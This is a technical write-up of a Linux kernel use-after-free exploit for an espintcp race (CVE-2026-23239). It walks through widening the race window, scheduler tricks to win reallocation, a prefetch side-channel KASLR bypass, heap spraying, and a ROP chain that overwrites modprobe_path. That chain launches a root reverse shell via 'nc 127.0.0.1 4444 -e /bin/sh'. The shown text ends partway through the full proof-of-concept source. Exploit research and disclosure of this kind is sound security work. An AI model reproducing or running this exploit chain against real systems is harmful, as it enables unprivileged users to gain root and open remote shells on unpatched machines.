An unprivileged user can send dummy IKE skb objects as follows. First, set fcntl(O_NONBLOCK) and setsockopt(TCP_NODELAY) so that send() does not block and the data goes straight into the NET_RX path, where the skb objects are linked into ctx->ike_queue. Then send dummy data in IKE format around 30 times. This builds up multiple skb objects in ctx->ike_queue, and as a result the execution time of skb_queue_purge(&ctx->ike_queue) increases to roughly 10 µs.
int flags = fcntl(conn_fd, F_GETFL, 0);
fcntl(server_fd, F_SETFL, flags | O_NONBLOCK);
int flag = 1;
if (setsockopt(server_fd, IPPROTO_TCP, TCP_NODELAY, &flag, sizeof(flag)) < 0) {
perror("setsockopt(TCP_NODELAY)");
}
unsigned char msg[7];
msg[0] = 0x00; msg[1] = 0x07; // full_len = 7
msg[2] = 0x00; msg[3] = 0x00; msg[4] = 0x00; msg[5] = 0x00; // marker = 0
msg[6] = 0x01; // extra (len > 4)
for (int i = 0; i < 30; i++) {
ssize_t n = send(server_fd, msg, sizeof(msg), 0);
}
At this point, the espintcp worker can still be scheduled even after cancel_work_sync(), so triggering a UAF requires freeing the victim object, struct espintcp_ctx, first. This ctx shares its lifetime with the socket (struct sock) and is freed together with it on the socket destruction path. More specifically, when the socket’s reference count is exhausted and the socket is destroyed, both sk and ctx are freed through the sk_destruct() path.
To free the victim object, the server side socket needs to be closed at the right time so that it enters the socket destruction path. Calling close() on the TCP socket leads to __tcp_close(). Looking at its implementation, if there are still skb objects left in sk->sk_receive_queue [10], the code takes the path that sends an RST instead of performing a normal FIN shutdown [11]. This behavior corresponds to what is described in RFC 2525, section 2.17.
void __tcp_close(struct sock *sk, long timeout)
{
bool data_was_unread = false;
[...]
while ((skb = skb_peek(&sk->sk_receive_queue)) != NULL) {
u32 end_seq = TCP_SKB_CB(skb)->end_seq;
if (TCP_SKB_CB(skb)->tcp_flags & TCPHDR_FIN)
end_seq--;
if (after(end_seq, tcp_sk(sk)->copied_seq))
data_was_unread = true; // <=[10]
tcp_eat_recv_skb(sk, skb);
}
/* If socket has been already reset (e.g. in tcp_reset()) - kill it. */
if (sk->sk_state == TCP_CLOSE)
goto adjudge_to_death;
[...]
if (sk->sk_state != TCP_CLOSE) {
if (tcp_check_oom(sk, 0)) {
tcp_set_state(sk, TCP_CLOSE);
tcp_send_active_reset(sk, GFP_ATOMIC, // <=[11]
SK_RST_REASON_TCP_ABORT_ON_MEMORY);
__NET_INC_STATS(sock_net(sk),
LINUX_MIB_TCPABORTONMEMORY);
} else if (!check_net(sock_net(sk))) {
/* Not possible to send reset; just close */
tcp_set_state(sk, TCP_CLOSE);
}
}
[...]
}
Because many skb objects are already queued in the server side sk->sk_receive_queue to trigger the vulnerability, calling close() takes the path that sends an RST instead of performing a normal FIN based shutdown. As a result, TCP’s 4-way handshake does not happen, and ctx is freed together with sk inside espintcp_close() before the espintcp worker runs. That is where the UAF becomes possible.
After that, when kworker enters worker_thread() and calls move_linked_works() to pick up the espintcp worker handler, a UAF on ctx is triggered. This happens because ctx->work was linked into the queue at the time schedule_work() was called, so the code still follows that work item even after ctx has been freed on the socket destruction path.
More concretely, during the list_for_each_entry_safe_from(work, n, NULL, entry) walk inside move_linked_works(), the already freed ctx->work is dereferenced, and the UAF occurs at that point.
static void move_linked_works(struct work_struct *work, struct list_head *head,
struct work_struct **nextp)
{
struct work_struct *n;
/*
* Linked worklist will always end before the end of the list,
* use NULL for list head.
*/
list_for_each_entry_safe_from(work, n, NULL, entry) {
list_move_tail(&work->entry, head);
if (!(*work_data_bits(work) & WORK_STRUCT_LINKED))
break;
}
[...]
}
At this point in the race scenario, the current step can be summarized as the following diagram.
Forcing the RST Fast Path
In the previous step of the scenario, the server side socket had to be closed before tcp_close() was called on the client side. If the order is reversed, the victim object is freed in the server side close path, and the attempt to trigger the UAF fails.
Once a close(server_sk) step is added to the race scenario, another timing constraint is introduced. That makes the probability of triggering the vulnerability even lower. To improve the stability of the race, this step needs to be skipped.
To do that, before the actual race scenario starts, the server sends dummy data to the client that does not match the ESP or IKE formats parsed by espintcp_parser(). When the client socket is then closed, the path goes through an RST instead of a FIN. This not only avoids the 4-way handshake, but also allows sk and ctx to be freed regardless of whether the server side socket is explicitly closed.
More specifically, if the user sends dummy data as shown below, the skb objects are linked into sk->sk_receive_queue rather than ctx->ike_queue.
int flags = fcntl(conn_fd, F_GETFL, 0);
fcntl(server_fd, F_SETFL, flags | O_NONBLOCK);
int flag = 1;
if (setsockopt(server_fd, IPPROTO_TCP, TCP_NODELAY, &flag, sizeof(flag)) < 0) {
perror("setsockopt(TCP_NODELAY)");
}
char buf[10];
memset(buf, 'A', sizeof(buf));
for (int i = 0; i < RECV_QUEUE_SPRAY; i++) {
ssize_t n = write(conn_fd, buf, 7);
}
At this point, small chunks of data are sent many times so that the increase of sk->sk_rmem_alloc is kept low while as many skb objects as possible are linked into sk->sk_receive_queue. The goal is to make the loop inside __tcp_close() that calls tcp_eat_recv_skb() run for as long as possible[12].
void __tcp_close(struct sock *sk, long timeout)
{
bool data_was_unread = false;
[...]
while ((skb = skb_peek(&sk->sk_receive_queue)) != NULL) {
u32 end_seq = TCP_SKB_CB(skb)->end_seq;
if (TCP_SKB_CB(skb)->tcp_flags & TCPHDR_FIN)
end_seq--;
if (after(end_seq, tcp_sk(sk)->copied_seq))
data_was_unread = true;
tcp_eat_recv_skb(sk, skb); // <=[12]
}
[...]
}
This is done to secure an additional race window for heap spraying later in the race scenario. The details of that part are described in a later step.
To sum up, this step of sending dummy data serves two purposes.
First, by placing skb objects in sk->sk_receive_queue instead of ctx->ike_queue, the path is forced into the RST case where sk and ctx are freed regardless of whether the server side socket is closed.
Second, by sending a large number of small messages and building up as many skb objects as possible in sk->sk_receive_queue, the execution time of the tcp_eat_recv_skb() loop inside __tcp_close() is intentionally stretched. This creates an additional race window that can be used for heap spraying in the later part of the scenario.
At this step, the updated scenario can be summarized as the following diagram.
Extending the Window with timerfd
By sending around 30 IKE skb, the race window can be extended to roughly 10 µs, but that is still not enough for the scenario to succeed reliably. In theory, sending more IKE skb would widen the race window further. In practice, however, doing so reduces the number of skb that can be linked into sk->sk_receive_queue, which shortens the maximum delay in the __tcp_close() path. From an overall point of view, this makes it difficult to extend the race window any further.
At this point, a different approach is needed. For this step, Jann Horn’s timerfd technique is used to extend the existing race window from about 10 µs to roughly 40000 µs. This technique is particularly effective in a CONFIG_PREEMPT=n environment.
The idea is to attach a large number of epoll waiters to the waitqueue of a timerfd, and then make the kernel spend a long time running when the timerfd_tmrproc() handler is invoked in hardirq context on timer expiration. In that path, __wake_up_common() ends up walking the list linearly, which artificially widens the race window.
static int __wake_up_common(struct wait_queue_head *wq_head, unsigned int mode,
int nr_exclusive, int wake_flags, void *key)
{
wait_queue_entry_t *curr, *next;
lockdep_assert_held(&wq_head->lock);
curr = list_first_entry(&wq_head->head, wait_queue_entry_t, entry);
if (&curr->entry == &wq_head->head)
return nr_exclusive;
list_for_each_entry_safe_from(curr, next, &wq_head->head, entry) {
unsigned flags = curr->flags;
int ret;
ret = curr->func(curr, mode, wake_flags, key); // ep_poll_callback()
if (ret < 0)
break;
if (ret && (flags & WQ_FLAG_EXCLUSIVE) && !--nr_exclusive)
break;
}
return nr_exclusive;
}
Because this hrtimer runs in hardirq context, the kernel stays busy while __wake_up_common() runs for a long time. Any pending softirq is then handled immediately after the hardirq returns. This makes it very useful for widening the window until the Delayed ACK timer expires.
Looking at the interrupt call stack, if the Delayed ACK timer expires successfully while an artificial delay is injected using timerfd, the event is very likely to be handled through the following path.
instr_sysvec_apic_timer_interrupt() // DEFINE_IDTENTRY_SYSVEC(sysvec_apic_timer_interrupt)
run_sysvec_on_irqstack_cond()
irq_enter_rcu()
__sysvec_apic_timer_interrupt()
local_apic_timer_interrupt()
hrtimer_interrupt(dev) // evt->event_handler(evt)
__hrtimer_run_queues()
__run_hrtimer()
timerfd_tmrproc()
timerfd_triggered()
wake_up_locked_poll()
__wake_up_locked_key()
__wake_up_common() // Long-running wakeup scan (epoll waiters)
if (!tick_program_event(expires_next, 0))
if (++retries < 3) goto retry;
__hrtimer_run_queues()
__run_hrtimer()
tick_nohz_handler()
tick_sched_handle()
update_process_times()
run_local_timers()
if (jiffies >= base->next_expiry)
raise_timer_softirq(TIMER_SOFTIRQ)
irq_exit_rcu()
__irq_exit_rcu()
if (local_softirq_pending())
invoke_softirq()
__do_softirq()
handle_softirqs()
pending = local_softirq_pending();
run_timer_softirq() // h->action()
...
tcp_delack_timer() // Delayed ACK timer handler
First, execution enters through the APIC timer interrupt, and the timerfd_tmrproc() handler attached to the hrtimer runs from hrtimer_interrupt(). Along this path, the wake-up path through __wake_up_common() consumes time. After that, the flow goes through the retry path and calls the tick_nohz_handler(), where expiration of jiffies based timers is detected and TIMER_SOFTIRQ is raised. Finally, on the interrupt exit path, the softirq is processed and the Delayed ACK timer handler, tcp_delack_timer(), is executed.
With timerfd added, the current scenario can be summarized as the following diagram.
Winning the Reallocation Race with Scheduling
Up to this point, the steps so far make it possible to trigger a UAF write in the espintcp worker context. One problem still remains. Right after espintcp_close(), which frees ctx, returns, the espintcp worker that triggers the UAF write runs almost immediately. That leaves practically no time for the attacker to perform heap spraying.
The espintcp worker is queued on the bound workqueue system_percpu_wq, so its execution is guaranteed to happen after ctx is freed. The trade-off is that the gap between the moment ctx is freed and the moment the worker actually runs and performs the UAF write becomes very short. In practice, this gap is around 7 µs, and reliably performing heap spraying within that window is not easy.
There are two approaches to address this problem.
The first is pure race-based reallocation. This approach targets the brief moment right after ctx is freed in espintcp_close(), and has a heap spray thread on another CPU race to reallocate ctx. For this to work, ctx needs to be moved to the node partial list first so that it can be reallocated from another CPU.
The advantage of this approach is that it is relatively simple to implement, but the downside is clear. The gap between freeing ctx and the worker running is only about 7 µs, which means there are only one or two practical chances to attempt an allocation. As a result, it depends heavily on timing and the success rate ends up being very low. This adds another tiny race window on top of an already complex race scenario, so this approach is not used at this step.
The second approach is to take advantage of the properties of the CFS/EEVDF schedulers and “win” the reallocation race. This focuses on creating a situation where the heap spray thread can run before the worker.
In a typical Linux distribution environment, an unprivileged user cannot lower the nice value to a negative number via setpriority(), nor can they use real-time scheduling classes such as SCHED_RR. Because of that, directly raising the priority of the heap spray thread over the worker is not an option. Instead, an indirect way is used to disturb the scheduling order.
CFS tracks the accumulated execution time of each task as vruntime and, based on that, selects the best eligible task from the runqueue by considering the calculated deadline and the eligibility conditions.
static int vruntime_eligible(struct cfs_rq *cfs_rq, u64 vruntime)
{
struct sched_entity *curr = cfs_rq->curr;
s64 avg = cfs_rq->avg_vruntime;
long load = cfs_rq->avg_load;
if (curr && curr->on_rq) {
unsigned long weight = scale_load_down(curr->load.weight);
avg += entity_key(cfs_rq, curr) * weight;
load += weight;
}
return avg >= (s64)(vruntime - cfs_rq->min_vruntime) * load;
}
Accordingly, the goal of this step is to migrate the heap spray thread onto the same CPU runqueue as the espintcp worker, thereby introducing a new scheduling case in which it can be selected before the espintcp worker.
To do that, when creating the heap spray thread, pthread_attr_setaffinity_np(CPU0) is called on cpu1 so that the thread is set up to migrate to cpu0, where espintcp_close() runs. After that, pthread_create() calls the sched_setaffinity() syscall internally to set the CPU affinity for the thread. This sequence of operations is performed within the delay window that was injected in the previous step using the walk over sk->sk_receive_queue inside __tcp_close() [12].
pthread_attr_t attr;
cpu_set_t cpus;
pthread_t th;
pthread_attr_init(&attr);
CPU_ZERO(&cpus);
CPU_SET(0, &cpus); // cpu0 only
if (pthread_attr_setaffinity_np(&attr, sizeof(cpu_set_t), &cpus) != 0) {
perror("pthread_attr_setaffinity_np");
exit(1);
}
if (pthread_create(&th, &attr, key_spray, NULL) != 0) {
perror("pthread_create");
exit(1);
}
When a task migration happens due to an affinity change, the kernel repositions the task’s vruntime and deadline against the avg_vruntime of the new runqueue, based on the lag(vlag) that was computed at dequeue time. This process is meant to preserve fairness by keeping the lag, but in certain situations it can end up placing the task ahead of other runnable entities on the same CPU, so that it is selected first.
static void update_entity_lag(struct cfs_rq *cfs_rq, struct sched_entity *se)
{
s64 vlag, limit;
WARN_ON_ONCE(!se->on_rq);
vlag = avg_vruntime(cfs_rq) - se->vruntime;
limit = calc_delta_fair(max_t(u64, 2*se->slice, TICK_NSEC), se);
se->vlag = clamp(vlag, -limit, limit);
}
static bool
dequeue_entity(struct cfs_rq *cfs_rq, struct sched_entity *se, int flags)
{
[...]
update_entity_lag(cfs_rq, se);
if (sched_feat(PLACE_REL_DEADLINE) && !sleep) {
se->deadline -= se->vruntime;
se->rel_deadline = 1;
}
[...]
}
static void
place_entity(struct cfs_rq *cfs_rq, struct sched_entity *se, int flags)
{
u64 vslice, vruntime = avg_vruntime(cfs_rq);
s64 lag = 0;
if (!se->custom_slice)
se->slice = sysctl_sched_base_slice;
vslice = calc_delta_fair(se->slice, se);
if (sched_feat(PLACE_LAG) && cfs_rq->nr_queued && se->vlag) {
struct sched_entity *curr = cfs_rq->curr;
unsigned long load;
lag = se->vlag;
[...]
}
se->vruntime = vruntime - lag;
if (se->rel_deadline) {
se->deadline += se->vruntime;
se->rel_deadline = 0;
return;
}
if (sched_feat(PLACE_DEADLINE_INITIAL) && (flags & ENQUEUE_INITIAL))
vslice /= 2;
se->deadline = se->vruntime + vslice;
}
The call stack for this task migration is as follows. After the heap spray thread is migrated through the sched_setaffinity() system call path, the TIF_NEED_RESCHED flag is set on the espintcp_close() task that is currently running on cpu0. Because of that, scheduling is triggered on the syscall exit path after espintcp_close() returns (or TIF_NEED_RESCHED may already have been set even earlier).
SYSCALL_DEFINE3(sched_setaffinity)
sched_setaffinity(pid, new_mask)
__sched_setaffinity(pid, new_mask)
__set_cpus_allowed_ptr(p, ctx)
__set_cpus_allowed_ptr_locked(p)
affine_move_task()
move_queued_task(rq=rp_cpu1, p, new_cpu=cpu0)
deactivate_task(rq_cpu1, p, DEQUEUE_NOCLOCK) // Dequeue the heap spray thread from the old cpu1 rq
dequeue_task(rq_cpu1, p)
dequeue_task_fair(rq_cpu1)
dequeue_entities(rq_cpu1)
dequeue_entity(rq_cpu1)
update_entity_lag(rq_cpu1)
se->vlag = clamp(vlag, -limit, limit); // Save vlag
set_task_cpu(p, cpu0)
activate_task(rq_cpu0, p, 0) // Enqueue the heap spray thread onto the cpu0 rq
enqueue_task(rq_cpu0, p)
enqueue_task_fair(rq_cpu0)
enqueue_entity(rq_cpu0)
place_entity(rq_cpu0)
se->vruntime = vruntime - lag; // Apply the saved vlag
wakeup_preempt(rq_cpu0)
resched_curr(rq_cpu0)
__resched_curr(rq_cpu0, TIF_NEED_RESCHED)
set_nr_and_not_polling(TIF_NEED_RESCHED)
set_ti_thread_flag(cpu0, TIF_NEED_RESCHED) // Set TIF_NEED_RESCHED on the espintcp_close task
smp_send_reschedule(cpu0) // Send sysvec_reschedule_ipi to cpu0
Of course, the exact scheduling outcome under CFS depends on many factors and cannot be predicted in a fully deterministic way, and because of the various mechanisms that exist to preserve fairness, it is also difficult to cause dramatic changes in ordering. Even so, this step makes it possible to introduce a new case in which the heap spray thread can slip in before the worker runs right after ctx is freed. As a result, reallocation can be nudged even within a very short window of around 7 µs. That said, this process inherently relies on indirect influence and probabilistic attempts, so repeated trials are required to achieve a sufficient success rate.
In addition, there is room to combine this with another idea. A thread can be created in advance and put to sleep, then woken up at the right time, or cycled through sleep and wake-up repeatedly, to steer it toward a relatively smaller vruntime. This may create more favorable conditions for increasing the lag value. However, this idea has not been validated in practice, and due to the lag averaging performed in place_entity(), it is unlikely to produce a meaningful effect.
In any case, this step still looks like an area with room for further refinement.
The Full Timeline
The following diagram shows the final sequence that achieves a Use-After-Free with this espintcp vulnerability.
Some kernel call stacks and the exact entry points of softirqs are omitted for the sake of clarity.
Exploit Sequence
Bypassing KASLR via Prefetch Attack
Before getting into the actual exploit, this exploit uses a Prefetch Side-Channel Attack to bypass KASLR. Because the race scenario in this vulnerability is highly complex, using the same vulnerability twice, once for an information leak and once for triggering the UAF, is not practical. For that reason, the KASLR bypass relies on a separate side channel technique to improve exploit reliability.
On microarchitectures where Meltdown mitigations are applied in hardware, KPTI is often disabled. In such environments, it is already well known that the kernel text can be inferred using a Prefetch Attack.
This exploit takes advantage of that property to compute the locations of kernel symbols and build the ROP payload.
From UAF to Exploitation Primitive
Now this UAF write needs to be promoted into a primitive that can be used for an actual exploit. Under the current race scenario, there are two candidate objects that can be reallocated at the freed address: struct espintcp_ctx and struct sock. In other words, the same UAF write can end up overwriting either type of object.
struct espintcp_ctx {
struct strparser strp;
struct sk_buff_head ike_queue;
struct sk_buff_head out_queue;
struct espintcp_msg partial;
void (*saved_data_ready)(struct sock *sk);
void (*saved_write_space)(struct sock *sk);
void (*saved_destruct)(struct sock *sk);
struct work_struct work;
bool tx_running;
};
struct sock {
/*
* Now struct inet_timewait_sock also uses sock_common, so please just
* don't add nothing before this first member (__sk_common) --acme
*/
struct sock_common __sk_common;
#define sk_node __sk_common.skc_node
#define sk_nulls_node __sk_common.skc_nulls_node
#define sk_refcnt __sk_common.skc_refcnt
#define sk_tx_queue_mapping __sk_common.skc_tx_queue_mapping
[...]
};
Looking at the workqueue execution flow, the first place where the freed pointer is dereferenced is on the ctx side. kworker touches struct espintcp_ctx first, and only follows sk later. For this reason, overwriting ctx is a more direct primitive for hijacking control flow than overwriting sk.
In particular, kworker calls process_one_work() to run a work handler, and this function directly calls the function pointer work->func stored in struct work_struct. Since struct espintcp_ctx embeds struct work_struct work, overwriting ctx->work.func via the UAF write allows control flow to be redirected to an arbitrary address in kworker context. Because ctx->work is passed as an argument, it also makes stack pivoting possible. The process_one_work() site is the key path that promotes the current UAF write into a RIP control primitive.
struct work_struct {
atomic_long_t data;
struct list_head entry;
work_func_t func;
#ifdef CONFIG_LOCKDEP
struct lockdep_map lockdep_map;
#endif
};
static void process_one_work(struct worker *worker, struct work_struct *work)
__releases(&pool->lock)
__acquires(&pool->lock)
{
[...]
worker->current_func = work->func;
[...]
worker->current_func(work);
[...]
}
The call stack from waking up kworker to reaching process_one_work() looks as follows.
worker_thread()
work = list_first_entry(&pool->worklist)
assign_work(work, &worker->scheduled) // work: &ctx->work
move_linked_works(work)
list_for_each_entry_safe_from(work, n, NULL, entry)
list_move_tail(&work->entry, head)
if (!(*work_data_bits(work) & WORK_STRUCT_LINKED)) break;
process_scheduled_works()
process_one_work()
Among these frames, move_linked_works() is the first place that dereferences the freed ctx->work. It starts from the current UAF object, ctx->work, and walks the list, moving each entry to &worker->scheduled.
#define work_data_bits(work) ((unsigned long *)(&(work)->data))
static void move_linked_works(struct work_struct *work, struct list_head *head,
struct work_struct **nextp)
{
struct work_struct *n;
/*
* Linked worklist will always end before the end of the list,
* use NULL for list head.
*/
list_for_each_entry_safe_from(work, n, NULL, entry) {
list_move_tail(&work->entry, head);
if (!(*work_data_bits(work) & WORK_STRUCT_LINKED)) // <=[13]
break;
}
[...]
}
static bool assign_work(struct work_struct *work, struct worker *worker,
struct work_struct **nextp)
{
[...]
move_linked_works(work, &worker->scheduled, nextp);
return true;
}
At this point, list_move_tail() internally calls __list_del_entry_valid() to perform a list integrity check.
static __always_inline bool __list_del_entry_valid(struct list_head *entry)
{
bool ret = true;
if (!IS_ENABLED(CONFIG_DEBUG_LIST)) {
struct list_head *prev = entry->prev;
struct list_head *next = entry->next;
if (likely(prev->next == entry && next->prev == entry))
return true;
ret = false;
}
ret &= __list_del_entry_valid_or_report(entry);
return ret;
}
static inline void __list_del_entry(struct list_head *entry)
{
if (!__list_del_entry_valid(entry))
return;
__list_del(entry->prev, entry->next);
}
static inline void list_move_tail(struct list_head *list,
struct list_head *head)
{
__list_del_entry(list);
list_add_tail(list, head);
}
The current test kernel is built from the Ubuntu 25.10 configuration, so CONFIG_DEBUG_LIST is disabled. Because of that, the kernel does not panic in the __list_del_entry_valid_or_report() path. This allows the attacker to keep execution going by placing any readable, valid kernel address into entry->prev when ctx is reallocated.
In this state, list_move_tail() fails to unlink the node and ends up only executing list_add_tail(). As a result, an invalid node remains in pool->worklist. If the walk in move_linked_works() continues, the next pointer n computed by the list_for_each_entry_safe_from() macro ends up pointing to an invalid address. On the following iteration, that invalid pointer is treated as a work_struct, and list manipulation starts to run out of control. For this reason, in this scenario, the WORK_STRUCT_LINKED flag must be added to work->data using a | operation, so that the loop breaks immediately after the first iteration[13].
If the same exploit is attempted on a kernel with CONFIG_DEBUG_LIST enabled, simply writing an arbitrary kernel address into entry->prev is not enough to pass the validation step. In that case, slab allocation alignment has to be matched and a real object containing a struct list_head must be placed at the ctx->work.entry position using a cross cache technique. Only then can the list integrity check be bypassed and execution be driven along the same path.
Next, process_one_work() also has a set of conditions that must be satisfied before reaching a point where RIP control is possible. This section lists, in order, which values need to be set inside process_one_work() so that execution continues and eventually reaches the function pointer call site.
struct pool_workqueue {
struct worker_pool *pool; /* I: the associated pool */
struct workqueue_struct *wq; /* I: the owning workqueue */
[...]
u64 stats[PWQ_NR_STATS];
[...]
} __aligned(1 << WORK_STRUCT_PWQ_SHIFT);
static inline struct pool_workqueue *work_struct_pwq(unsigned long data)
{
return (struct pool_workqueue *)(data & WORK_STRUCT_PWQ_MASK); // WORK_STRUCT_PWQ_MASK: 256 bytes alignment
}
static struct pool_workqueue *get_work_pwq(struct work_struct *work)
{
unsigned long data = atomic_long_read(&work->data);
if (data & WORK_STRUCT_PWQ)
return work_struct_pwq(data);
else
return NULL;
}
static void process_one_work(struct worker *worker, struct work_struct *work)
__releases(&pool->lock)
__acquires(&pool->lock)
{
struct pool_workqueue *pwq = get_work_pwq(work); // <=[14]
struct worker_pool *pool = worker->pool;
unsigned long work_data;
int lockdep_start_depth, rcu_start_depth;
bool bh_draining = pool->flags & POOL_BH_DRAINING;
[...]
strscpy(worker->desc, pwq->wq->name, WORKER_DESC_LEN); // <=[15]
[...]
pwq->stats[PWQ_STAT_STARTED]++; // <=[16] PWQ_STAT_STARTED: 0
[...]
}
- After retrieving
pwqwithget_work_pwq(), it is used as the basis for several operations[14]. The kernel uses the lower 256 bytes of thestruct pool_workqueuepointer for flags, so applyingWORK_STRUCT_PWQ_MASKmeanspwqis always interpreted as a 256 byte aligned address. Since data is then copied frompwq->wq->name[15], this ends up dereferencing the pointer atpwq+0x08. When the object is reallocated,work->datatherefore needs to contain a kernel pointer that satisfies this alignment and masking rule. - Since
pwq->stats[PWQ_STAT_STARTED]++is executed[16], the memory atpwq+0xa8needs to be writable kernel memory.
Any kernel symbol that satisfies the conditions above can be used, but this article uses net_families. Since net_families is a pointer array with 46 entries, each element is laid out contiguously in 8 byte units. As a result, one of the elements in the array can be used as a pointer that can be dereferenced at the pwq+0x08 position. Of course, that element needs to be a pointer to a socket family that is already registered in the kernel.
#define AF_MAX 46
#define NPROTO AF_MAX
static const struct net_proto_family __rcu *net_families[NPROTO] __read_mostly;
net_families also lives in the __read_mostly section, and this region is writable. That means a write to the pwq+0xa8 offset is also possible.
To summarize, the memory layout of struct work_struct required to reach RIP control looks as follows. In the test environment, the element at the pwq+0x08 position corresponds to AF_CAN, so the diagram is drawn based on that.
Heap Spray with user_key_payload
Since the UAF object, ctx, is allocated with GFP_KERNEL, a struct user_key_payload, which is also allocated with GFP_KERNEL, is used as the heap spray object. Because cross cache is not used here, the allocation flags need to match in this step.
static int espintcp_init_sk(struct sock *sk)
{
struct espintcp_ctx *ctx;
ctx = kzalloc(sizeof(*ctx), GFP_KERNEL);
[...]
}
struct user_key_payload has a header made up of rcu and datalen, so when placing the payload, the offset needs to be calculated with this header size in mind.
struct user_key_payload {
struct rcu_head rcu; /* RCU destructor */
unsigned short datalen; /* length of this data */
char data[] __aligned(__alignof__(u64)); /* actual data */
};
Construction of the ROP Payload
ctx->work.func and the ROP payload can be arranged along the following lines. Since the point where RIP control is obtained is in the kworker context, it is not possible to return directly to user space. For this reason, this exploit builds the payload by overwriting modprobe_path[].
ctx->work.func = push_rdi_pop_rsp_pop_rbx_pop_r12_pop_r13_pop_r14_ret;
ctx->payload[t++] = pop_rdi_pop_rsi_pop_rdx_pop_rcx_ret;
ctx->payload[t++] = modprobe_path;
ctx->payload[t++] = (void *)fake_modprobe;
ctx->payload[t++] = (void *)strlen(fake_modprobe);
ctx->payload[t++] = 0;
ctx->payload[t++] = _copy_from_user;
ctx->payload[t++] = pop_rbx_ret;
ctx->payload[t++] = (void *)30000;
ctx->payload[t++] = mdelay;
At this point, execution must not return immediately after the preceding copy_from_user() call. It has to stay in place until a root shell is obtained. The reason is that, during the object reallocation phase, ctx->work.prev is overwritten, which makes __list_del() fail. As a result, a corrupted node remains in pool->worklist. If a kworker that uses this pool wakes up again in this state, it will dereference that corrupted node and the kernel will panic.
For the waiting period, mdelay() must be used instead of msleep(). msleep() calls schedule() internally and yields the CPU. If the current task is running in a worker context, this can cause a new kworker (for example, kworker/0:1, kworker/0:2, …) to be spawned on the same CPU and continue processing. In that case, pool->worklist will be accessed again, and the previously left corrupted node may be dereferenced, leading to a kernel panic.
static inline void sched_submit_work(struct task_struct *tsk)
{
static DEFINE_WAIT_OVERRIDE_MAP(sched_map, LD_WAIT_CONFIG);
unsigned int task_flags;
/*
* Establish LD_WAIT_CONFIG context to ensure none of the code called
* will use a blocking primitive -- which would lead to recursion.
*/
lock_map_acquire_try(&sched_map);
task_flags = tsk->flags;
/*
* If a worker goes to sleep, notify and ask workqueue whether it
* wants to wake up a task to maintain concurrency.
*/
if (task_flags & PF_WQ_WORKER)
wq_worker_sleeping(tsk);
[...]
}
In addition, mdelay is defined as a macro, so it cannot be called directly like a normal function, and udelay only allows a limited delay to be specified as an argument. To introduce a sufficiently long delay, the assembly sequence generated by code that calls mdelay() has to be reused instead.
#define mdelay(n) (\
(__builtin_constant_p(n) && (n)<=MAX_UDELAY_MS) ? udelay((n)*1000) : \
({unsigned long __ms=(n); while (__ms--) udelay(1000);}))
0xffffffff81439fe7 <suspend_test+39>: mov edi,0x418958
0xffffffff81439fec <suspend_test+44>: call 0xffffffff828d9ec0 <__const_udelay>
0xffffffff81439ff1 <suspend_test+49>: sub rbx,0x1
0xffffffff81439ff5 <suspend_test+53>: jne 0xffffffff81439fe7 <suspend_test+39>
0xffffffff81439ff7 <suspend_test+55>: mov eax,0x1
0xffffffff81439ffc <suspend_test+60>: pop rbx
0xffffffff81439ffd <suspend_test+61>: ret
In this exploit, the script written to modprobe_path is implemented so that it launches a reverse shell.
#define MODPROBE_SCRIPT "#!/bin/sh\nnc 127.0.0.1 4444 -e /bin/sh\n"
char fake_modprobe[40] = {0};
int modprobe_script_fd = memfd_create("", MFD_CLOEXEC);
pid_t pid = getpid();
dprintf(modprobe_script_fd, MODPROBE_SCRIPT);
snprintf(fake_modprobe, sizeof(fake_modprobe), "/proc/%i/fd/%i", pid, modprobe_script_fd);
While the kworker is busy-waiting in mdelay(), triggering request_module() from another CPU will result in a root privileged reverse shell being spawned.
Full Exploit Chain
The full exploit code is available here:
Exploit Code
/*
* PoC for: Out-of-Cancel Race in espintcp (CVE-2026-23239)
*
* Affected:
* - Linux kernel < v7.0-rc2
* - x86_64, tested with CONFIG_XFRM_ESPINTCP=y, CONFIG_PREEMPT=n
*
* Usage:
* $ gcc -o exploit exploit.c -pthread
* $ ./exploit &
* $ nc -lvp 4444
*
* Author: Hyunwoo Kim (V4bel)
*/
#define _GNU_SOURCE
#include <stdio.h>
#include <string.h>
#include <errno.h>
#include <unistd.h>
#include <arpa/inet.h>
#include <netinet/tcp.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <stdlib.h>
#include <signal.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <fcntl.h>
#include <sys/timerfd.h>
#include <sys/epoll.h>
#include <sys/mman.h>
#include <sys/prctl.h>
#include <linux/prctl.h>
#include <sched.h>
#include <sys/syscall.h>
#include <sys/xattr.h>
#include <pthread.h>
#include <linux/keyctl.h>
#include <sys/sendfile.h>
#include <linux/if_alg.h>
#include <sys/resource.h>
#include <limits.h>
#define FAIL_IF(x) if ((x)) { \
perror(#x); \
return -1; \
}
#define STACK_SIZE 0x8000
#define MAIN_CPU 0
#define HELPER_CPU 1
#define TRIG_ERROR 0
#define TRIG_RETRY 1
#define KEY_SPRAY_COUNT 20
#define IKE_COUNT 30
#define RCV_QUEUE_COUNT 1000000
#define SENDMSG_COUNT 100000
#define GROOMING_COUNT 500
#define DELAY_STAGE_1 16080
#define DELAY_STAGE_2 17000
struct list_head {
struct list_head *next;
struct list_head *prev;
};
struct work_struct {
void *data;
struct list_head entry;
void *func;
};
struct espintcp_ctx {
char dummy_1[1056 - 24];
struct work_struct work;
void *payload[10];
};
char tfd_buf[0x1000];
int g_tfd;
int epoll_fds[0x2c0];
int epoll_timefds[0x300];
int fds[500];
void *trigger_stack = NULL;
volatile int status_trig = TRIG_ERROR;
struct espintcp_ctx *ctx;
pthread_attr_t attr;
cpu_set_t cpus;
uint64_t kbase = 0xffffffff81000000;
uint64_t find_min(uint64_t arr[], int size) {
if (size <= 0) {
printf("Array size must be greater than 0.\n");
return INT_MAX;
}
uint64_t min = arr[0];
for (int i = 1; i < size; i++) {
if (arr[i] < min) {
min = arr[i];
}
}
return min;
}
// KASLR bypass
// This code is adapted from https://github.com/IAIK/prefetch/blob/master/cacheutils.h
inline __attribute__((always_inline)) uint64_t rdtsc_begin() {
uint64_t a, d;
asm volatile ("mfence\n\t"
"RDTSCP\n\t"
"mov %%rdx, %0\n\t"
"mov %%rax, %1\n\t"
"xor %%rax, %%rax\n\t"
"lfence\n\t"
: "=r" (d), "=r" (a)
:
: "%rax", "%rbx", "%rcx", "%rdx");
a = (d<<32) | a;
return a;
}
inline __attribute__((always_inline)) uint64_t rdtsc_end() {
uint64_t a, d;
asm volatile(
"xor %%rax, %%rax\n\t"
"lfence\n\t"
"RDTSCP\n\t"
"mov %%rdx, %0\n\t"
